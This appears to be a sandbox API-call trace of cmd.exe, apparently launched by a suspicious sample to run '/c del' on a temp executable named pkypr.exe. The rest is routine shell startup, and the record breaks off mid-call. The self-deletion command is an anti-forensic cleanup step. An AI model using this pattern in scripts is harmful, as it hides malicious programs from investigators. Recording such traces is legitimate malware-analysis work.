[0136.106] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74580000 [0136.106] GetProcAddress (hModule=0x74580000, lpProcName="SetThreadUILanguage") returned 0x745c2510 [0136.106] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.124] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.124] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x44fff18 | out: phkResult=0x44fff18*=0x0) returned 0x2 [0136.124] VirtualQuery (in: lpAddress=0x44fff1f, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x44ff000, AllocationBase=0x4400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.125] VirtualQuery (in: lpAddress=0x4400000, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x4400000, AllocationBase=0x4400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.125] VirtualQuery (in: lpAddress=0x4401000, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x4401000, AllocationBase=0x4400000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.125] VirtualQuery (in: lpAddress=0x4403000, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x4403000, AllocationBase=0x4400000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.125] VirtualQuery (in: lpAddress=0x4500000, lpBuffer=0x44ffed0, dwLength=0x1c | out: lpBuffer=0x44ffed0*(BaseAddress=0x4500000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0136.125] GetConsoleOutputCP () returned 0x1b5 [0136.125] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x18f460 | out: lpCPInfo=0x18f460) returned 1 [0136.125] SetConsoleCtrlHandler (HandlerRoutine=0x180e40, Add=1) returned 1 [0136.125] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.126] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0136.126] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.126] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x18f40c | out: lpMode=0x18f40c) returned 1 [0136.126] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.126] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0136.126] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.126] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x18f408 | out: lpMode=0x18f408) returned 1 [0136.127] _get_osfhandle (_FileHandle=0) returned 0x38 [0136.127] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0136.127] GetEnvironmentStringsW () returned 0x4547fb8* [0136.127] GetProcessHeap () returned 0x4540000 [0136.127] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0xb04) returned 0x4548ac8 [0136.127] memcpy (in: _Dst=0x4548ac8, _Src=0x4547fb8, _Size=0xb04 | out: _Dst=0x4548ac8) returned 0x4548ac8 [0136.127] FreeEnvironmentStringsA (penv="=") returned 1 [0136.127] GetProcessHeap () returned 0x4540000 [0136.127] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x4) returned 0x4543610 [0136.127] GetEnvironmentStringsW () returned 0x4547fb8* [0136.127] GetProcessHeap () returned 0x4540000 [0136.128] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0xb04) returned 0x45495d8 [0136.128] memcpy (in: _Dst=0x45495d8, _Src=0x4547fb8, _Size=0xb04 | out: _Dst=0x45495d8) returned 0x45495d8 [0136.128] FreeEnvironmentStringsA (penv="=") returned 1 [0136.128] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x44fee7c | out: phkResult=0x44fee7c*=0x94) returned 0x0 [0136.128] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x49, lpcbData=0x44fee80*=0x1000) returned 0x2 [0136.128] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x1, lpcbData=0x44fee80*=0x4) returned 0x0 [0136.128] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x1, lpcbData=0x44fee80*=0x1000) returned 0x2 [0136.128] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x0, lpcbData=0x44fee80*=0x4) returned 0x0 [0136.128] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x40, lpcbData=0x44fee80*=0x4) returned 0x0 [0136.128] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x40, lpcbData=0x44fee80*=0x4) returned 0x0 [0136.128] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x40, lpcbData=0x44fee80*=0x1000) returned 0x2 [0136.128] RegCloseKey (hKey=0x94) returned 0x0 [0136.129] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x44fee7c | out: phkResult=0x44fee7c*=0x94) returned 0x0 [0136.129] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x40, lpcbData=0x44fee80*=0x1000) returned 0x2 [0136.129] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x1, lpcbData=0x44fee80*=0x4) returned 0x0 [0136.129] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x1, lpcbData=0x44fee80*=0x1000) returned 0x2 [0136.129] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x0, lpcbData=0x44fee80*=0x4) returned 0x0 [0136.129] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x9, lpcbData=0x44fee80*=0x4) returned 0x0 [0136.129] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x4, lpData=0x44fee88*=0x9, lpcbData=0x44fee80*=0x4) returned 0x0 [0136.129] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x44fee84, lpData=0x44fee88, lpcbData=0x44fee80*=0x1000 | out: lpType=0x44fee84*=0x0, lpData=0x44fee88*=0x9, lpcbData=0x44fee80*=0x1000) returned 0x2 [0136.129] RegCloseKey (hKey=0x94) returned 0x0 [0136.129] time (in: timer=0x0 | out: timer=0x0) returned 0x62736d86 [0136.129] srand (_Seed=0x62736d86) [0136.129] GetCommandLineW () returned="/c del \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe\"" [0136.129] GetCommandLineW () returned="/c del \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe\"" [0136.130] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x197720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.131] GetProcessHeap () returned 0x4540000 [0136.131] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x210) returned 0x4547fb8 [0136.131] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4547fc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0136.131] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x18f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0136.131] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x18f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0136.131] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x18f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.131] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.131] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.131] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.131] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.131] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.131] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.131] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.131] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.132] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.132] GetProcessHeap () returned 0x4540000 [0136.132] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x4548ac8) returned 1 [0136.132] GetEnvironmentStringsW () returned 0x45481d0* [0136.132] GetProcessHeap () returned 0x4540000 [0136.132] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0xb1c) returned 0x454ac10 [0136.133] memcpy (in: _Dst=0x454ac10, _Src=0x45481d0, _Size=0xb1c | out: _Dst=0x454ac10) returned 0x454ac10 [0136.133] FreeEnvironmentStringsA (penv="=") returned 1 [0136.133] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x18f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0136.133] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x18f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.133] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.133] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.133] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.133] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.133] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.133] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.133] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.133] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.133] GetProcessHeap () returned 0x4540000 [0136.133] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x30) returned 0x4547258 [0136.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x44ffc54 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x44ffc54, lpFilePart=0x44ffc4c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x44ffc4c*="system32") returned 0x13 [0136.134] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0136.134] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x44ff9d0 | out: lpFindFileData=0x44ff9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe99c5a19, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe99c5a19, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x45473d0 [0136.134] FindClose (in: hFindFile=0x45473d0 | out: hFindFile=0x45473d0) returned 1 [0136.134] memcpy (in: _Dst=0x44ffc5a, _Src=0x44ff9fc, _Size=0xe | out: _Dst=0x44ffc5a) returned 0x44ffc5a [0136.134] FindFirstFileW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x44ff9d0 | out: lpFindFileData=0x44ff9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc99a46a3, ftLastAccessTime.dwHighDateTime=0x1d8596d, ftLastWriteTime.dwLowDateTime=0xc99a46a3, ftLastWriteTime.dwHighDateTime=0x1d8596d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x45473d0 [0136.134] FindClose (in: hFindFile=0x45473d0 | out: hFindFile=0x45473d0) returned 1 [0136.134] memcpy (in: _Dst=0x44ffc6a, _Src=0x44ff9fc, _Size=0x10 | out: _Dst=0x44ffc6a) returned 0x44ffc6a [0136.134] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0136.135] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0136.135] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0136.135] GetProcessHeap () returned 0x4540000 [0136.135] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x454ac10) returned 1 [0136.135] GetEnvironmentStringsW () returned 0x454a0e8* [0136.135] GetProcessHeap () returned 0x4540000 [0136.135] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0xb4c) returned 0x454ac40 [0136.135] memcpy (in: _Dst=0x454ac40, _Src=0x454a0e8, _Size=0xb4c | out: _Dst=0x454ac40) returned 0x454ac40 [0136.135] FreeEnvironmentStringsA (penv="=") returned 1 [0136.135] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x197720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.135] GetProcessHeap () returned 0x4540000 [0136.136] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x4547258) returned 1 [0136.136] GetProcessHeap () returned 0x4540000 [0136.136] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x400e) returned 0x454b798 [0136.137] GetProcessHeap () returned 0x4540000 [0136.137] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x76) returned 0x45473d0 [0136.137] GetProcessHeap () returned 0x4540000 [0136.137] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x454b798) returned 1 [0136.137] GetConsoleOutputCP () returned 0x1b5 [0136.142] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x18f460 | out: lpCPInfo=0x18f460) returned 1 [0136.142] GetUserDefaultLCID () returned 0x409 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x1934a0, cchData=8 | out: lpLCData=":") returned 2 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x44ffd84, cchData=128 | out: lpLCData="0") returned 2 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x44ffd84, cchData=128 | out: lpLCData="0") returned 2 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x44ffd84, cchData=128 | out: lpLCData="1") returned 2 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x1934b0, cchData=8 | out: lpLCData="/") returned 2 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x193500, cchData=32 | out: lpLCData="Mon") returned 4 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x193540, cchData=32 | out: lpLCData="Tue") returned 4 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x193580, cchData=32 | out: lpLCData="Wed") returned 4 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x1935c0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x193600, cchData=32 | out: lpLCData="Fri") returned 4 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x193640, cchData=32 | out: lpLCData="Sat") returned 4 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x193680, cchData=32 | out: lpLCData="Sun") returned 4 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x1934c0, cchData=8 | out: lpLCData=".") returned 2 [0136.143] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x1934e0, cchData=8 | out: lpLCData=",") returned 2 [0136.143] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.145] GetProcessHeap () returned 0x4540000 [0136.145] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x0, Size=0x20c) returned 0x4548d28 [0136.145] GetConsoleTitleW (in: lpConsoleTitle=0x4548d28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0136.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74580000 [0136.146] GetProcAddress (hModule=0x74580000, lpProcName="CopyFileExW") returned 0x7459ffc0 [0136.146] GetProcAddress (hModule=0x74580000, lpProcName="IsDebuggerPresent") returned 0x7459b0b0 [0136.146] GetProcAddress (hModule=0x74580000, lpProcName="SetConsoleInputExeNameW") returned 0x7753b440 [0136.146] GetProcessHeap () returned 0x4540000 [0136.146] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x400a) returned 0x454b798 [0136.146] GetProcessHeap () returned 0x4540000 [0136.147] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x454b798) returned 1 [0136.147] _wcsicmp (_String1="del", _String2=")") returned 59 [0136.148] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0136.148] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0136.148] _wcsicmp (_String1="IF", _String2="del") returned 5 [0136.148] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0136.148] _wcsicmp (_String1="REM", _String2="del") returned 14 [0136.148] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0136.148] GetProcessHeap () returned 0x4540000 [0136.148] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x58) returned 0x4548f40 [0136.148] GetProcessHeap () returned 0x4540000 [0136.148] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x10) returned 0x4547258 [0136.149] GetProcessHeap () returned 0x4540000 [0136.149] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x6c) returned 0x4548fa0 [0136.150] GetConsoleTitleW (in: lpConsoleTitle=0x44ffa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0136.151] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0136.151] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0136.151] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0136.151] GetProcessHeap () returned 0x4540000 [0136.151] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0xd0) returned 0x4549018 [0136.151] GetProcessHeap () returned 0x4540000 [0136.151] RtlReAllocateHeap (Heap=0x4540000, Flags=0x0, Ptr=0x4549018, Size=0x6c) returned 0x4549018 [0136.151] GetProcessHeap () returned 0x4540000 [0136.151] RtlSizeHeap (HeapHandle=0x4540000, Flags=0x0, MemoryPointer=0x4549018) returned 0x6c [0136.152] GetProcessHeap () returned 0x4540000 [0136.152] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x74) returned 0x454bfc0 [0136.152] GetProcessHeap () returned 0x4540000 [0136.152] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0xd0) returned 0x4549090 [0136.152] GetProcessHeap () returned 0x4540000 [0136.152] RtlReAllocateHeap (Heap=0x4540000, Flags=0x0, Ptr=0x4549090, Size=0x6c) returned 0x4549090 [0136.152] GetProcessHeap () returned 0x4540000 [0136.152] RtlSizeHeap (HeapHandle=0x4540000, Flags=0x0, MemoryPointer=0x4549090) returned 0x6c [0136.152] GetProcessHeap () returned 0x4540000 [0136.153] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x66) returned 0x4549108 [0136.153] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x44ff818 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.153] GetProcessHeap () returned 0x4540000 [0136.153] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x38) returned 0x4547270 [0136.153] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x44fe888 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.153] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x44feabc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x44feac0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x44feabc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0136.153] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0136.153] GetProcessHeap () returned 0x4540000 [0136.153] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x2c) returned 0x4549178 [0136.153] GetProcessHeap () returned 0x4540000 [0136.153] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x258) returned 0x45491b0 [0136.153] _wcsicmp (_String1="pkypr.exe", _String2=".") returned 66 [0136.153] _wcsicmp (_String1="pkypr.exe", _String2="..") returned 66 [0136.153] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe")) returned 0x20 [0136.154] GetProcessHeap () returned 0x4540000 [0136.154] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x210) returned 0x45405c8 [0136.154] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x45405d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0136.154] SetErrorMode (uMode=0x0) returned 0x1 [0136.154] SetErrorMode (uMode=0x1) returned 0x0 [0136.154] GetFullPathNameW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe", nBufferLength=0x104, lpBuffer=0x44feee8, lpFilePart=0x44feebc | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe", lpFilePart=0x44feebc*="pkypr.exe") returned 0x2e [0136.154] SetErrorMode (uMode=0x1) returned 0x1 [0136.155] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0136.155] GetProcessHeap () returned 0x4540000 [0136.155] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x258) returned 0x45407e0 [0136.155] _wcsicmp (_String1="pkypr.exe", _String2=".") returned 66 [0136.155] _wcsicmp (_String1="pkypr.exe", _String2="..") returned 66 [0136.155] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe")) returned 0x20 [0136.155] GetProcessHeap () returned 0x4540000 [0136.155] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x1c) returned 0x4549410 [0136.155] GetProcessHeap () returned 0x4540000 [0136.155] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x52) returned 0x4549438 [0136.155] GetProcessHeap () returned 0x4540000 [0136.155] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x52) returned 0x4549498 [0136.155] GetProcessHeap () returned 0x4540000 [0136.155] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x8, Size=0x808) returned 0x454a0e8 [0136.155] FindFirstFileExW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe"), fInfoLevelId=0x0, lpFindFileData=0x454a0f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x454a0f4) returned 0x45494f8 [0136.155] GetProcessHeap () returned 0x4540000 [0136.155] RtlAllocateHeap (HeapHandle=0x4540000, Flags=0x0, Size=0x14) returned 0x4547938 [0136.156] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0136.156] NtOpenFile (in: FileHandle=0x44fedbc, DesiredAccess=0x10000, ObjectAttributes=0x44fed84*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x44fedac, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x44fedbc*=0xa4, IoStatusBlock=0x44fedac*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0136.157] RtlReleaseRelativeName () returned 0x44fed9c [0136.157] RtlFreeAnsiString (AnsiString="\\") [0136.157] NtQueryVolumeInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x44fece8, FsInformation=0x44fecf0, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x44fece8, FsInformation=0x44fecf0) returned 0x0 [0136.157] CloseHandle (hObject=0xa4) returned 1 [0136.159] FindNextFileW (in: hFindFile=0x45494f8, lpFindFileData=0x454a0f4 | out: lpFindFileData=0x454a0f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb151200, ftCreationTime.dwHighDateTime=0x1d85fb1, ftLastAccessTime.dwLowDateTime=0xac43371a, ftLastAccessTime.dwHighDateTime=0x1d86048, ftLastWriteTime.dwLowDateTime=0xbb151200, ftLastWriteTime.dwHighDateTime=0x1d85fb1, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkypr.exe", cAlternateFileName="")) returned 0 [0136.160] GetLastError () returned 0x12 [0136.160] FindClose (in: hFindFile=0x45494f8 | out: hFindFile=0x45494f8) returned 1 [0136.160] GetProcessHeap () returned 0x4540000 [0136.160] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x454a0e8) returned 1 [0136.161] GetProcessHeap () returned 0x4540000 [0136.161] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x4549498) returned 1 [0136.161] GetProcessHeap () returned 0x4540000 [0136.161] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x4549410) returned 1 [0136.161] GetProcessHeap () returned 0x4540000 [0136.161] RtlFreeHeap (HeapHandle=0x4540000, Flags=0x0, BaseAddress=0x4549438) returned 1 [0136.161] GetProcessHeap () returned 0x4540000 [0136.162] RtlFreeHeap (HeapHandle=0x4540000, 